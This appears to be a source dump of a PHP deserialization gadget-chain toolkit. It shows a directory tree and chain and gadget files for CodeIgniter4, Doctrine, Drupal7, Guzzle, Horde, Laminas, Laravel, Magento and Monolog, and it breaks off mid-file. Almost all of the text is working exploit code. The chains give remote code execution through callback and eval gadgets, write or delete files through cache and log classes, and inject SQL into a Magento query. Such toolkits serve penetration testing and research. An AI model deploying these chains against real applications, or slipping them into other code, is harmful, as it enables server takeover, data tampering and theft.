├── LICENSE ├── README.md ├── gadgetchains ├── CodeIgniter4 │ └── RCE │ │ ├── 1 │ │ ├── chain.php │ │ └── gadgets.php │ │ └── 2 │ │ ├── chain.php │ │ └── gadgets.php ├── Doctrine │ └── FW │ │ ├── 1 │ │ ├── chain.php │ │ └── gadgets.php │ │ └── 2 │ │ ├── chain.php │ │ └── gadgets.php ├── Drupal7 │ ├── FD │ │ └── 1 │ │ │ ├── chain.php │ │ │ └── gadgets.php │ └── RCE │ │ └── 1 │ │ ├── chain.php │ │ └── gadgets.php ├── Guzzle │ ├── FW │ │ └── 1 │ │ │ ├── chain.php │ │ │ └── gadgets.php │ ├── INFO │ │ └── 1 │ │ │ ├── chain.php │ │ │ └── gadgets.php │ └── RCE │ │ └── 1 │ │ ├── chain.php │ │ └── gadgets.php ├── Horde │ └── RCE │ │ └── 1 │ │ ├── chain.php │ │ └── gadgets.php ├── Laminas │ ├── FD │ │ └── 1 │ │ │ ├── chain.php │ │ │ └── gadgets.php │ └── FW │ │ └── 1 │ │ ├── chain.php │ │ └── gadgets.php ├── Laravel │ ├── FW │ │ └── 1 │ │ │ ├── chain.php │ │ │ └── gadgets.php │ └── RCE │ │ ├── 1 │ │ ├── chain.php │ │ └── gadgets.php │ │ ├── 2 │ │ ├── chain.php │ │ └── gadgets.php │ │ ├── 3 │ │ ├── chain.php │ │ └── gadgets.php │ │ ├── 4 │ │ ├── chain.php │ │ └── gadgets.php │ │ ├── 5 │ │ ├── chain.php │ │ └── gadgets.php │ │ ├── 6 │ │ ├── chain.php │ │ └── gadgets.php │ │ └── 7 │ │ ├── chain.php │ │ └── gadgets.php ├── Magento │ ├── FW │ │ └── 1 │ │ │ ├── chain.php │ │ │ └── gadgets.php │ └── SQLI │ │ └── 1 │ │ ├── chain.php │ │ └── gadgets.php ├── Monolog │ └── RCE │ │ ├── 1 │ │ ├── chain.php │ │ └── gadgets.php │ │ ├── 2 │ │ ├── chain.php │ │ └── gadgets.php │ │ ├── 3 │ │ ├── chain.php │ │ └── gadgets.php │ │ ├── 4 │ │ ├── chain.php │ │ └── gadgets.php │ │ ├── 5 │ │ ├── chain.php │ │ └── gadgets.php │ │ ├── 6 │ │ ├── chain.php │ │ └── gadgets.php │ │ └── 7 │ │ ├── chain.php │ │ └── gadgets.php ├── PHPCSFixer │ └── FD │ │ ├── 1 │ │ ├── chain.php │ │ └── gadgets.php │ │ └── 2 │ │ ├── chain.php │ │ └── gadgets.php ├── PHPExcel │ └── FD │ │ ├── 1 │ │ ├── chain.php │ │ └── gadgets.php │ │ ├── 2 │ │ ├── chain.php │ │ └── gadgets.php │ │ ├── 3 │ │ ├── chain.php │ │ └── gadgets.php │ │ └── 4 │ │ ├── chain.php │ │ └── gadgets.php ├── Phalcon │ └── RCE │ │ └── 1 │ │ ├── chain.php │ │ └── gadgets.php ├── Pydio │ └── Guzzle │ │ └── RCE │ │ └── 1 │ │ ├── chain.php │ │ └── gadgets.php ├── Slim │ └── RCE │ │ └── 1 │ │ ├── chain.php │ │ └── gadgets.php ├── Smarty │ ├── FD │ │ └── 1 │ │ │ ├── chain.php │ │ │ └── gadgets.php │ └── SSRF │ │ └── 1 │ │ ├── chain.php │ │ └── gadgets.php ├── SwiftMailer │ ├── FD │ │ └── 1 │ │ │ ├── chain.php │ │ │ └── gadgets.php │ └── FW │ │ ├── 1 │ │ ├── chain.php │ │ └── gadgets.php │ │ ├── 2 │ │ ├── chain.php │ │ └── gadgets.php │ │ ├── 3 │ │ ├── chain.php │ │ └── gadgets.php │ │ └── 4 │ │ ├── chain.php │ │ └── gadgets.php ├── Symfony │ ├── FW │ │ ├── 1 │ │ │ ├── chain.php │ │ │ └── gadgets.php │ │ └── 2 │ │ │ ├── chain.php │ │ │ └── gadgets.php │ └── RCE │ │ ├── 1 │ │ ├── chain.php │ │ └── gadgets.php │ │ ├── 2 │ │ ├── chain.php │ │ └── gadgets.php │ │ ├── 3 │ │ ├── chain.php │ │ └── gadgets.php │ │ ├── 4 │ │ ├── chain.php │ │ └── gadgets.php │ │ └── 5 │ │ ├── chain.php │ │ └── gadgets.php ├── TCPDF │ └── FD │ │ └── 1 │ │ ├── chain.php │ │ └── gadgets.php ├── ThinkPHP │ ├── FW │ │ ├── 1 │ │ │ ├── chain.php │ │ │ └── gadgets.php │ │ └── 2 │ │ │ ├── chain.php │ │ │ └── gadgets.php │ └── RCE │ │ ├── 1 │ │ ├── chain.php │ │ └── gadgets.php │ │ ├── 2 │ │ ├── chain.php │ │ └── gadgets.php │ │ ├── 3 │ │ ├── chain.php │ │ └── gadgets.php │ │ ├── 4 │ │ ├── chain.php │ │ └── gadgets.php │ │ ├── 5 │ │ ├── chain.php │ │ └── gadgets.php │ │ ├── 6 │ │ ├── chain.php │ │ └── gadgets.php │ │ └── 7 │ │ ├── chain.php │ │ └── gadgets.php ├── WordPress │ ├── Dompdf │ │ └── RCE │ │ │ ├── 1 │ │ │ ├── chain.php │ │ │ └── gadgets.php │ │ │ └── 2 │ │ │ ├── chain.php │ │ │ └── gadgets.php │ ├── Guzzle │ │ └── RCE │ │ │ ├── 1 │ │ │ ├── chain.php │ │ │ └── gadgets.php │ │ │ └── 2 │ │ │ ├── chain.php │ │ │ └── gadgets.php │ ├── P │ │ ├── EmailSubscribers │ │ │ └── RCE │ │ │ │ └── 1 │ │ │ │ ├── chain.php │ │ │ │ └── gadgets.php │ │ ├── EverestForms │ │ │ └── RCE │ │ │ │ └── 1 │ │ │ │ ├── chain.php │ │ │ │ └── gadgets.php │ │ ├── WooCommerce │ │ │ └── RCE │ │ │ │ ├── 1 │ │ │ │ ├── chain.php │ │ │ │ └── gadgets.php │ │ │ │ └── 2 │ │ │ │ ├── chain.php │ │ │ │ └── gadgets.php │ │ └── YetAnotherStarsRating │ │ │ └── RCE │ │ │ └── 1 │ │ │ ├── chain.php │ │ │ └── gadgets.php │ ├── PHPExcel │ │ └── RCE │ │ │ ├── 1 │ │ │ ├── chain.php │ │ │ └── gadgets.php │ │ │ ├── 2 │ │ │ ├── chain.php │ │ │ └── gadgets.php │ │ │ ├── 3 │ │ │ ├── chain.php │ │ │ └── gadgets.php │ │ │ ├── 4 │ │ │ ├── chain.php │ │ │ └── gadgets.php │ │ │ ├── 5 │ │ │ ├── chain.php │ │ │ └── gadgets.php │ │ │ └── 6 │ │ │ ├── chain.php │ │ │ └── gadgets.php │ └── generic │ │ └── gadgets.php ├── Yii │ └── RCE │ │ └── 1 │ │ ├── chain.php │ │ └── gadgets.php ├── Yii2 │ └── RCE │ │ ├── 1 │ │ ├── chain.php │ │ └── gadgets.php │ │ ├── 2 │ │ ├── chain.php │ │ └── gadgets.php │ │ └── 3 │ │ ├── chain.php │ │ └── gadgets.php └── ZendFramework │ ├── FD │ └── 1 │ │ ├── chain.php │ │ └── gadgets.php │ └── RCE │ ├── 1 │ ├── chain.php │ └── gadgets.php │ ├── 2 │ ├── chain.php │ └── gadgets.php │ ├── 3 │ ├── chain.php │ └── gadgets.php │ ├── 4 │ ├── chain.php │ └── gadgets.php │ └── 5 │ ├── chain.php │ └── gadgets.php ├── lib ├── PHPGGC.php ├── PHPGGC │ ├── Enhancement │ │ ├── ASCIIStrings.php │ │ ├── Enhancement.php │ │ ├── Enhancements.php │ │ ├── FastDestruct.php │ │ ├── PlusNumbers.php │ │ └── Wrapper.php │ ├── Exception.php │ ├── GadgetChain.php │ ├── GadgetChain │ │ ├── FileDelete.php │ │ ├── FileRead.php │ │ ├── FileWrite.php │ │ ├── PHPInfo.php │ │ ├── RCE.php │ │ ├── RCE │ │ │ ├── Command.php │ │ │ ├── FunctionCall.php │ │ │ └── PHPCode.php │ │ ├── SSRF.php │ │ └── SqlInjection.php │ ├── InvalidArgumentsException.php │ ├── Phar │ │ ├── Format.php │ │ ├── Phar.php │ │ ├── Tar.php │ │ └── Zip.php │ └── Util.php └── test_payload.php ├── other └── debug_rce │ ├── debug_rce.php │ └── test.txt ├── phpggc ├── templates ├── chain.php └── gadgets.php └── test-gc-compatibility.py /gadgetchains/CodeIgniter4/RCE/1/chain.php: -------------------------------------------------------------------------------- 1 | redis = new \CodeIgniter\Session\Handlers\MemcachedHandler( 9 | new \CodeIgniter\Model( 10 | new \CodeIgniter\Database\BaseBuilder, 11 | new \CodeIgniter\Validation\Validation, 12 | $func 13 | ), 14 | $param 15 | ); 16 | } 17 | } 18 | } 19 | 20 | namespace CodeIgniter\Session\Handlers { 21 | class MemcachedHandler { 22 | protected $memcached; 23 | protected $lockKey; 24 | 25 | public function __construct($memcached, $param) { 26 | $this->lockKey = $param; 27 | $this->memcached = $memcached; 28 | } 29 | } 30 | } 31 | 32 | namespace CodeIgniter { 33 | class Model { 34 | protected $builder; 35 | protected $primaryKey; 36 | protected $beforeDelete; 37 | protected $validationRules; 38 | protected $validation; 39 | 40 | public function __construct($builder, $validation, $func) { 41 | $this->builder = $builder; 42 | $this->primaryKey = null; 43 | 44 | $this->beforeDelete = array(); 45 | $this->beforeDelete[] = "validate"; 46 | 47 | $this->validation = $validation; 48 | $this->validationRules = array( 49 | "id" => array( 50 | "rules" => array($func) 51 | ) 52 | ); 53 | } 54 | } 55 | } 56 | 57 | namespace CodeIgniter\Validation { 58 | class Validation { 59 | protected $ruleSetFiles; 60 | 61 | public function __construct() { 62 | $this->ruleSetFiles = array("finfo"); 63 | } 64 | } 65 | } 66 | 67 | namespace CodeIgniter\Database { 68 | class BaseBuilder { 69 | } 70 | } 71 | -------------------------------------------------------------------------------- /gadgetchains/CodeIgniter4/RCE/2/chain.php: -------------------------------------------------------------------------------- 1 | redis = new \CodeIgniter\Session\Handlers\MemcachedHandler( 9 | new \CodeIgniter\Model( 10 | new \CodeIgniter\Database\BaseBuilder( 11 | new \CodeIgniter\Database\MySQLi\Connection 12 | ), 13 | new \CodeIgniter\Validation\Validation, 14 | $func, 15 | new \CodeIgniter\Database\MySQLi\Connection 16 | ), 17 | array("x" => $param) 18 | ); 19 | } 20 | } 21 | } 22 | 23 | namespace CodeIgniter\Session\Handlers { 24 | class MemcachedHandler { 25 | protected $memcached; 26 | protected $lockKey; 27 | 28 | public function __construct($memcached, $param) { 29 | $this->lockKey = $param; 30 | $this->memcached = $memcached; 31 | } 32 | } 33 | } 34 | 35 | namespace CodeIgniter { 36 | class Model { 37 | protected $builder; 38 | protected $primaryKey; 39 | protected $beforeDelete; 40 | protected $validationRules; 41 | protected $validation; 42 | protected $tempAllowCallbacks; 43 | 44 | public function __construct($builder, $validation, $func, $db) { 45 | $this->builder = $builder; 46 | $this->primaryKey = null; 47 | 48 | $this->beforeDelete = array(); 49 | $this->beforeDelete[] = "validate"; 50 | 51 | $this->tempAllowCallbacks = 1; 52 | $this->db = $db; 53 | 54 | $this->cleanValidationRules = false; 55 | $this->validation = $validation; 56 | $this->validationRules = array( 57 | "id.x" => array( 58 | "rules" => array($func, "dd") // function "dd" exits the script. 59 | ) 60 | ); 61 | } 62 | } 63 | } 64 | 65 | namespace CodeIgniter\Validation { 66 | class Validation { 67 | protected $ruleSetFiles; 68 | 69 | public function __construct() { 70 | $this->ruleSetFiles = array("finfo"); 71 | } 72 | } 73 | } 74 | 75 | namespace CodeIgniter\Database { 76 | class BaseBuilder { 77 | public function __construct($db) { 78 | $this->QBFrom = array("()"); 79 | $this->db = $db; 80 | } 81 | } 82 | } 83 | 84 | namespace CodeIgniter\Database\MySQLi { 85 | class Connection { 86 | } 87 | } 88 | 89 | -------------------------------------------------------------------------------- /gadgetchains/Doctrine/FW/1/chain.php: -------------------------------------------------------------------------------- 1 | extension)) 35 | $parameters['extension'] = '.' . $infos->extension; 36 | else 37 | $parameters['extension'] = ''; 38 | 39 | $parameters['directory'] = $infos->dirname; 40 | $parameters['path'] = $infos->dirname . '/e3/5b737464436c61737324434c4153534d455441444154415d5b315d' . $parameters['extension']; 41 | return $parameters; 42 | } 43 | 44 | public function generate(array $parameters) 45 | { 46 | $c = new Configuration([ 47 | 48 | ]); 49 | $table = (object) [ 50 | 'name' => $parameters['data'], 51 | 'schema' => '', 52 | 'indexes' => null, 53 | 'uniqueConstraints' => null, 54 | 'options' => null 55 | ]; 56 | $em0 = new EntityManager(null, $c); 57 | $d0 = new AnnotationDriver(new CachedReader([ 58 | 'stdClass' => 59 | [ 60 | 'Doctrine\ORM\Mapping\Embeddable' => true, 61 | 'Doctrine\ORM\Mapping\Table' => $table 62 | ] 63 | ])); 64 | $fc = new FilesystemCache($parameters['directory'], $parameters['extension']); 65 | $mf = new ClassMetadataFactory($fc, $em0, $d0); 66 | $em = new EntityManager($mf, null); 67 | $writer = new ResultSetMappingBuilder($em); 68 | 69 | return $writer; 70 | } 71 | } 72 | -------------------------------------------------------------------------------- /gadgetchains/Doctrine/FW/2/chain.php: -------------------------------------------------------------------------------- 1 | deferredItems = ['x' => $CacheItem]; 12 | $this->cache = $FilesystemCache; 13 | } 14 | } 15 | class CacheItem 16 | { 17 | private $value; 18 | 19 | public function __construct($phpCode) 20 | { 21 | $this->value = $phpCode; 22 | } 23 | } 24 | } 25 | 26 | namespace Doctrine\Common\Cache 27 | { 28 | class FileCache 29 | { 30 | private $extension; 31 | protected $directory; 32 | private $umask = 0002; 33 | 34 | public function __construct($extension, $directory) 35 | { 36 | $this->extension = $extension; 37 | $this->directory = $directory; 38 | } 39 | } 40 | 41 | class FilesystemCache extends FileCache {} 42 | } 43 | -------------------------------------------------------------------------------- /gadgetchains/Drupal7/FD/1/chain.php: -------------------------------------------------------------------------------- 1 | _temp_tarname = $_temp_tarname; 9 | } 10 | 11 | } 12 | -------------------------------------------------------------------------------- /gadgetchains/Drupal7/RCE/1/chain.php: -------------------------------------------------------------------------------- 1 | true, '#process'=>true, '#attached'=>true]; 7 | protected $storage = ['#form_id'=>'DrupalRCE','#process'=>['drupal_process_attached'], '#attached'=>[]]; 8 | 9 | public function __construct($function,$parameter) { 10 | $this->storage['#attached']+=[$function=>[[$parameter]]]; 11 | } 12 | } -------------------------------------------------------------------------------- /gadgetchains/Guzzle/FW/1/chain.php: -------------------------------------------------------------------------------- 1 | data = [ 12 | 'Expires' => 1, 13 | 'Discard' => false, 14 | 'Value' => $data 15 | ]; 16 | } 17 | } 18 | 19 | class CookieJar 20 | { 21 | private $cookies = []; 22 | private $strictMode; 23 | 24 | public function __construct($data) 25 | { 26 | $this->cookies = [new SetCookie($data)]; 27 | } 28 | } 29 | 30 | class FileCookieJar extends CookieJar 31 | { 32 | private $filename; 33 | private $storeSessionCookies = true; 34 | 35 | public function __construct($filename, $data) 36 | { 37 | parent::__construct($data); 38 | $this->filename = $filename; 39 | } 40 | } 41 | } -------------------------------------------------------------------------------- /gadgetchains/Guzzle/INFO/1/chain.php: -------------------------------------------------------------------------------- 1 | _fn_close)) { 13 | call_user_func($this->_fn_close); 14 | } 15 | } 16 | 17 | public function close() 18 | { 19 | return call_user_func($this->_fn_close); 20 | } 21 | */ 22 | } 23 | } -------------------------------------------------------------------------------- /gadgetchains/Guzzle/RCE/1/chain.php: -------------------------------------------------------------------------------- 1 | [ 24 | new \GuzzleHttp\HandlerStack($function, $parameter), 25 | 'resolve' 26 | ] 27 | ]); 28 | } 29 | } 30 | -------------------------------------------------------------------------------- /gadgetchains/Guzzle/RCE/1/gadgets.php: -------------------------------------------------------------------------------- 1 | methods = $methods; 17 | 18 | foreach ($methods as $name => $fn) { 19 | $this->{'_fn_' . $name} = $fn; 20 | } 21 | } 22 | 23 | /* 24 | public function __destruct() 25 | { 26 | if (isset($this->_fn_close)) { 27 | call_user_func($this->_fn_close); 28 | } 29 | } 30 | 31 | public function close() 32 | { 33 | return call_user_func($this->_fn_close); 34 | } 35 | */ 36 | } 37 | } 38 | 39 | namespace GuzzleHttp 40 | { 41 | class HandlerStack 42 | { 43 | private $handler; 44 | private $stack; 45 | private $cached = false; 46 | 47 | function __construct($function, $parameter) 48 | { 49 | $this->stack = [[$function]]; 50 | $this->handler = $parameter; 51 | } 52 | 53 | /* 54 | public function resolve() 55 | { 56 | if (!$this->cached) { 57 | if (!($prev = $this->handler)) { 58 | throw new \LogicException('No handler has been specified'); 59 | } 60 | 61 | foreach (array_reverse($this->stack) as $fn) { 62 | $prev = $fn[0]($prev); 63 | } 64 | 65 | $this->cached = $prev; 66 | } 67 | 68 | return $this->cached; 69 | } 70 | */ 71 | } 72 | } -------------------------------------------------------------------------------- /gadgetchains/Horde/RCE/1/chain.php: -------------------------------------------------------------------------------- 1 | 23 | -------------------------------------------------------------------------------- /gadgetchains/Horde/RCE/1/gadgets.php: -------------------------------------------------------------------------------- 1 | _oldConfig = $code; 9 | } 10 | } 11 | 12 | class Horde_Prefs_Scope implements Serializable 13 | { 14 | protected $_prefs = array(1); 15 | protected $scope; 16 | public function serialize() 17 | { 18 | return json_encode(array( 19 | $this->scope, 20 | $this->_prefs 21 | )); 22 | } 23 | 24 | public function unserialize($data) 25 | { 26 | list($this->scope, $this->_prefs) = json_decode($data, true); 27 | } 28 | } 29 | 30 | class Horde_Prefs 31 | { 32 | protected $_opts, $_scopes; 33 | function __construct($code) 34 | { 35 | $this->_opts['sizecallback'] = array(new Horde_Config($code), 'readXMLConfig'); 36 | $this->_scopes['horde'] = new Horde_Prefs_Scope; 37 | } 38 | } 39 | 40 | class Horde_Prefs_Identity 41 | { 42 | protected $_prefs, $_prefnames, $_identities; 43 | function __construct($code) 44 | { 45 | $this->_identities = array(0); 46 | $this->_prefs = new Horde_Prefs($code); 47 | $this->_prefnames['identities'] = 0; 48 | } 49 | } 50 | 51 | class Horde_Kolab_Server_Decorator_Clean 52 | { 53 | private $_server, $_added; 54 | function __construct($code) 55 | { 56 | $this->_added = array(0); 57 | $this->_server = new Horde_Prefs_Identity($code); 58 | } 59 | } 60 | ?> 61 | -------------------------------------------------------------------------------- /gadgetchains/Laminas/FD/1/chain.php: -------------------------------------------------------------------------------- 1 | cleanup = '1'; 6 | $this->streamName = $remote_path; 7 | } 8 | } 9 | } 10 | -------------------------------------------------------------------------------- /gadgetchains/Laminas/FW/1/chain.php: -------------------------------------------------------------------------------- 1 | namespace = ''; 13 | $this->keyPattern = '/.*/'; 14 | } 15 | } 16 | 17 | class FilesystemOptions extends AdapterOptions 18 | { 19 | protected $cacheDir; 20 | protected $dirLevel; 21 | protected $suffix; 22 | 23 | function __construct($cacheDir, $extension) 24 | { 25 | parent::__construct(); 26 | $this->cacheDir = $cacheDir; 27 | $this->suffix = $extension; 28 | $this->dirLevel = 0; 29 | } 30 | } 31 | 32 | class Filesystem 33 | { 34 | protected $options; 35 | 36 | function __construct($options) 37 | { 38 | 39 | $this->options = $options; 40 | } 41 | } 42 | } 43 | 44 | namespace Laminas\Cache\Psr\CacheItemPool 45 | { 46 | class CacheItemPoolDecorator 47 | { 48 | protected $storage; 49 | protected $deferred; 50 | 51 | function __construct($storage, $deferred) 52 | { 53 | $this->storage = $storage; 54 | $this->deferred = $deferred; 55 | } 56 | } 57 | 58 | class CacheItem 59 | { 60 | protected $key; 61 | protected $value; 62 | 63 | function __construct($key, $value) 64 | { 65 | $this->key = $key; 66 | $this->value = $value; 67 | } 68 | } 69 | } 70 | -------------------------------------------------------------------------------- /gadgetchains/Laravel/FW/1/chain.php: -------------------------------------------------------------------------------- 1 | callback = "file_put_contents"; 11 | $this->request = $file; 12 | $this->provider = $data; 13 | } 14 | } 15 | } 16 | 17 | namespace Illuminate\Queue { 18 | class QueueManager 19 | { 20 | protected $app; 21 | protected $connectors; 22 | 23 | public function __construct($file, $data) { 24 | $this->app = [ 25 | 'config'=>[ 26 | 'queue.default'=>'aaa', 27 | 'queue.connections.aaa'=>[ 28 | 'driver'=>'bbb' 29 | ], 30 | ] 31 | ]; 32 | 33 | $file = new \Illuminate\Auth\RequestGuard($file, $data); 34 | $this->connectors = [ 35 | 'bbb'=>[ 36 | $file, "user" 37 | ] 38 | ]; 39 | } 40 | } 41 | } 42 | 43 | namespace Symfony\Component\Routing\Loader\Configurator { 44 | class ImportConfigurator 45 | { 46 | private $parent; 47 | private $route; 48 | 49 | public function __construct($file, $data) 50 | { 51 | $this->parent = new \Illuminate\Queue\QueueManager($file, $data); 52 | $this->route = null; 53 | } 54 | } 55 | } -------------------------------------------------------------------------------- /gadgetchains/Laravel/RCE/1/chain.php: -------------------------------------------------------------------------------- 1 | events = $events; 13 | $this->event = $cmd; 14 | } 15 | } 16 | } 17 | 18 | 19 | namespace Faker 20 | { 21 | class Generator 22 | { 23 | protected $formatters; 24 | 25 | function __construct($function) 26 | { 27 | $this->formatters = ['dispatch' => $function]; 28 | } 29 | } 30 | } -------------------------------------------------------------------------------- /gadgetchains/Laravel/RCE/2/chain.php: -------------------------------------------------------------------------------- 1 | events = $events; 13 | $this->event = $parameter; 14 | } 15 | } 16 | } 17 | 18 | 19 | namespace Illuminate\Events 20 | { 21 | class Dispatcher 22 | { 23 | protected $listeners; 24 | 25 | function __construct($function, $parameter) 26 | { 27 | $this->listeners = [ 28 | $parameter => [$function] 29 | ]; 30 | } 31 | } 32 | } -------------------------------------------------------------------------------- /gadgetchains/Laravel/RCE/3/chain.php: -------------------------------------------------------------------------------- 1 | events = $events; 12 | } 13 | } 14 | } 15 | 16 | 17 | namespace Illuminate\Notifications 18 | { 19 | class ChannelManager 20 | { 21 | protected $app; 22 | protected $defaultChannel; 23 | protected $customCreators; 24 | 25 | function __construct($function, $parameter) 26 | { 27 | $this->app = $parameter; 28 | $this->customCreators = ['x' => $function]; 29 | $this->defaultChannel = 'x'; 30 | } 31 | } 32 | } -------------------------------------------------------------------------------- /gadgetchains/Laravel/RCE/4/chain.php: -------------------------------------------------------------------------------- 1 | events = $events; 13 | $this->event = $event; 14 | } 15 | } 16 | } 17 | 18 | 19 | namespace Illuminate\Validation 20 | { 21 | class Validator 22 | { 23 | public $extensions; 24 | 25 | function __construct($function) 26 | { 27 | $this->extensions = ['' => $function]; 28 | } 29 | } 30 | } -------------------------------------------------------------------------------- /gadgetchains/Laravel/RCE/5/chain.php: -------------------------------------------------------------------------------- 1 | '; 18 | return new \Illuminate\Broadcasting\PendingBroadcast($code); 19 | } 20 | } -------------------------------------------------------------------------------- /gadgetchains/Laravel/RCE/5/gadgets.php: -------------------------------------------------------------------------------- 1 | queueResolver = [new \Mockery\Loader\EvalLoader(), 'load']; 9 | } 10 | } 11 | } 12 | 13 | namespace Illuminate\Broadcasting { 14 | class PendingBroadcast { 15 | protected $events; 16 | protected $event; 17 | 18 | function __construct($evilCode) 19 | { 20 | $this->events = new \Illuminate\Bus\Dispatcher(); 21 | $this->event = new BroadcastEvent($evilCode); 22 | } 23 | } 24 | 25 | class BroadcastEvent { 26 | public $connection; 27 | 28 | function __construct($evilCode) 29 | { 30 | $this->connection = new \Mockery\Generator\MockDefinition($evilCode); 31 | } 32 | 33 | } 34 | } 35 | 36 | namespace Mockery\Loader { 37 | class EvalLoader {} 38 | } 39 | 40 | namespace Mockery\Generator { 41 | class MockDefinition { 42 | protected $config; 43 | protected $code; 44 | 45 | function __construct($evilCode) 46 | { 47 | $this->code = $evilCode; 48 | $this->config = new MockConfiguration(); 49 | } 50 | } 51 | 52 | class MockConfiguration { 53 | protected $name = 'abcdefg'; 54 | } 55 | } 56 | -------------------------------------------------------------------------------- /gadgetchains/Laravel/RCE/6/chain.php: -------------------------------------------------------------------------------- 1 | '; 21 | $expected = new \Illuminate\Broadcasting\PendingBroadcast($code); 22 | $res = new \Illuminate\Support\MessageBag($expected); 23 | return $res; 24 | 25 | } 26 | } 27 | -------------------------------------------------------------------------------- /gadgetchains/Laravel/RCE/6/gadgets.php: -------------------------------------------------------------------------------- 1 | queueResolver = [new \Mockery\Loader\EvalLoader(), 'load']; 9 | } 10 | } 11 | } 12 | 13 | namespace Illuminate\Broadcasting { 14 | class PendingBroadcast { 15 | protected $events; 16 | protected $event; 17 | 18 | function __construct($evilCode) 19 | { 20 | $this->events = new \Illuminate\Bus\Dispatcher(); 21 | $this->event = new BroadcastEvent($evilCode); 22 | } 23 | } 24 | 25 | class BroadcastEvent { 26 | public $connection; 27 | 28 | function __construct($evilCode) 29 | { 30 | $this->connection = new \Mockery\Generator\MockDefinition($evilCode); 31 | } 32 | 33 | } 34 | } 35 | 36 | namespace Illuminate\Support { 37 | class MessageBag { 38 | protected $messages = []; 39 | protected $format; 40 | 41 | function __construct($inner) { 42 | $this->format = $inner; 43 | } 44 | } 45 | } 46 | 47 | namespace Mockery\Loader { 48 | class EvalLoader {} 49 | } 50 | 51 | namespace Mockery\Generator { 52 | class MockDefinition { 53 | protected $config; 54 | protected $code; 55 | 56 | function __construct($evilCode) 57 | { 58 | $this->code = $evilCode; 59 | $this->config = new MockConfiguration(); 60 | } 61 | } 62 | 63 | class MockConfiguration { 64 | protected $name = 'abcdefg'; 65 | } 66 | } 67 | -------------------------------------------------------------------------------- /gadgetchains/Laravel/RCE/7/chain.php: -------------------------------------------------------------------------------- 1 | events = new \Illuminate\Bus\Dispatcher($function); 13 | $this->event = new \Illuminate\Queue\CallQueuedClosure($parameter); 14 | } 15 | } 16 | } 17 | 18 | namespace Illuminate\Bus 19 | { 20 | class Dispatcher 21 | { 22 | protected $queueResolver; 23 | 24 | public function __construct($function) 25 | { 26 | $this->queueResolver = $function; 27 | 28 | } 29 | } 30 | } 31 | 32 | namespace Illuminate\Queue 33 | { 34 | class CallQueuedClosure 35 | { 36 | protected $connection; 37 | 38 | public function __construct($parameter) 39 | { 40 | $this->connection = $parameter; 41 | } 42 | } 43 | } 44 | 45 | 46 | -------------------------------------------------------------------------------- /gadgetchains/Magento/FW/1/chain.php: -------------------------------------------------------------------------------- 1 | is either relative to the Magento root or absolute. The payload will throw an error during unserialization, but the file is written anyway.'; 11 | 12 | public function generate(array $parameters) 13 | { 14 | $parameters = parent::process_parameters($parameters); 15 | 16 | $file = $parameters['remote_path']; 17 | $payload = $parameters['data']; 18 | 19 | return new \Zend_Memory_Manager($file, $payload); 20 | } 21 | } 22 | -------------------------------------------------------------------------------- /gadgetchains/Magento/FW/1/gadgets.php: -------------------------------------------------------------------------------- 1 | _backend = new Varien_Cache_Backend_Eaccelerator( 8 | new Zend_Log ( 9 | new Zend_CodeGenerator_Php_File($file, $payload) 10 | ) 11 | ); 12 | } 13 | } 14 | 15 | class Varien_Cache_Backend_Eaccelerator { 16 | protected $_directives; 17 | 18 | function __construct($x) { 19 | $this->_directives = array(); 20 | $this->_directives["logging"] = true; 21 | $this->_directives["logger"] = $x; 22 | } 23 | } 24 | 25 | class Zend_Log { 26 | protected $_writers; 27 | protected $_priorities; 28 | 29 | function __construct($writer) { 30 | $this->_writers = array(); 31 | $this->_writers[0] = $writer; 32 | 33 | $this->_priorities = array(); 34 | $this->_priorities[3] = 1; 35 | $this->_priorities[4] = 1; 36 | } 37 | } 38 | 39 | class Zend_CodeGenerator_Php_File { 40 | protected $_filename; 41 | protected $_sourceContent; 42 | protected $_isSourceDirty; 43 | 44 | function __construct($fn, $payload) { 45 | $this->_filename= $fn; 46 | $this->_sourceContent = $payload; 47 | $this->_isSourceDirty = false; 48 | } 49 | } 50 | -------------------------------------------------------------------------------- /gadgetchains/Magento/SQLI/1/chain.php: -------------------------------------------------------------------------------- 1 | connected = true; 11 | $this->redis = $redis; 12 | } 13 | } 14 | 15 | class Mage_Sales_Model_Order_Payment_Transaction 16 | { 17 | protected $_isFailsafe; 18 | protected $_paymentObject; 19 | protected $_data; 20 | protected $_resourceName; 21 | protected $_idFieldName; 22 | 23 | public function __construct($sql) 24 | { 25 | $this->_isFailsafe = true; 26 | $this->_paymentObject = new Mage_Sales_Model_Order_Payment; 27 | $this->_data = [ 28 | 'order_id' => 1, 29 | 'store_id' => new Zend_Db_Expr('1); ' . $sql . ';--') 30 | ]; 31 | $this->_resourceName = 'log/log'; 32 | $this->_idFieldName = 'id'; 33 | } 34 | } 35 | 36 | class Zend_Db_Expr 37 | { 38 | protected $_expression; 39 | 40 | public function __construct($expression) 41 | { 42 | $this->_expression = $expression; 43 | } 44 | } 45 | 46 | class Mage_Sales_Model_Order_Payment 47 | { 48 | protected $_idFieldName; 49 | 50 | public function __construct() 51 | { 52 | $this->_idFieldName = 'id'; 53 | } 54 | } 55 | -------------------------------------------------------------------------------- /gadgetchains/Monolog/RCE/1/chain.php: -------------------------------------------------------------------------------- 1 | null] 20 | ) 21 | ); 22 | } 23 | } 24 | -------------------------------------------------------------------------------- /gadgetchains/Monolog/RCE/1/gadgets.php: -------------------------------------------------------------------------------- 1 | socket = $x; 12 | } 13 | } 14 | 15 | class BufferHandler 16 | { 17 | protected $handler; 18 | protected $bufferSize = -1; 19 | protected $buffer; 20 | # ($record['level'] < $this->level) == false 21 | protected $level = null; 22 | protected $initialized = true; 23 | # ($this->bufferLimit > 0 && $this->bufferSize === $this->bufferLimit) == false 24 | protected $bufferLimit = -1; 25 | protected $processors; 26 | 27 | function __construct($methods, $command) 28 | { 29 | $this->processors = $methods; 30 | $this->buffer = [$command]; 31 | $this->handler = $this; 32 | } 33 | } 34 | } 35 | -------------------------------------------------------------------------------- /gadgetchains/Monolog/RCE/2/chain.php: -------------------------------------------------------------------------------- 1 | null] 20 | ) 21 | ); 22 | } 23 | } -------------------------------------------------------------------------------- /gadgetchains/Monolog/RCE/2/gadgets.php: -------------------------------------------------------------------------------- 1 | socket = $x; 13 | } 14 | } 15 | 16 | class BufferHandler 17 | { 18 | protected $handler; 19 | protected $bufferSize = -1; 20 | protected $buffer; 21 | # ($record['level'] < $this->level) == false 22 | protected $level = null; 23 | protected $initialized = true; 24 | # ($this->bufferLimit > 0 && $this->bufferSize === $this->bufferLimit) == false 25 | protected $bufferLimit = -1; 26 | protected $processors; 27 | 28 | function __construct($methods, $command) 29 | { 30 | $this->processors = $methods; 31 | $this->buffer = 